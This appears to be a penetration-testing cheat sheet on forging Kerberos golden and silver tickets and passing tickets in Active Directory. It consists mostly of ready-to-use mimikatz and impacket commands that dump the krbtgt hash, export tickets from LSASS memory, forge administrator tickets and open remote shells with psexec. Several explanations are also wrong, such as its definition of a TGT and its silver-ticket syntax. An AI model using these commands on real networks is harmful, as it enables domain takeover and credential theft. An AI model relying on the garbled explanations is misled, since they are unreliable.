golden silver passing ticket
Silver ticket is more stealth and discreet; only for target service
Golden ticket works for any kerberos service
Description of terms:
TGT: ticket to a service account issued by the KDC and can only access that service.
KRBTGT: service account in KDC; issues all TGTs. If possible to impersonate this account and create a golden ticket, we have ability to create a service ticket for any service
Golden Ticket
using mimikatz
# dump hash and SID
lsadump::lsa /inject /name: krbtgt
# create ticket golden
kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500
# open a new elevated command prompt with the given ticket in mimikatz.
misc::cmd
using impacket
impacket-ticketer -nthash KRBTGT_NTLM_HASH -domain-sid DOMAIN_SID -domain FQDN_DOMAIN USERNAME
export KRB5CCNAME=FILE.cache
impacket-psexec DOMAIN/USER@DOMAIN -k -no-pass
# can try impacket-secretsdump
Silver Ticket
mimikatz
# dump
lsadump::lsa /inject /name: [<domain-admin-account> | <service-account>]
# create ticket silver
kerberos::golden /user:<USER> /domain:DOMAINM /sid:SID /krbtgt:SERVICE_NTLM_hash /id:1103
misc::cmd
Pass-the-ticket
Can be used for dumping user credentials inside an AD network
Can dump the TGT from the LSASS memory (which stores Kerberos ticket as the gatekeeper and accept or reject the credentials provided)
Gives a .kirbi ticket - can be used to get domain admin
Allows to escalate to domain admin if you dump a domain admin's ticket and then impersonate that ticket
using mimikatz
# exports all .kirbi to current directory
sekurlsa::tickets /export
# find some admin .kirbi from krbtgt
kerberos::ptt TICKET
# to check if ticket is working
> klist
Last updated
Was this helpful?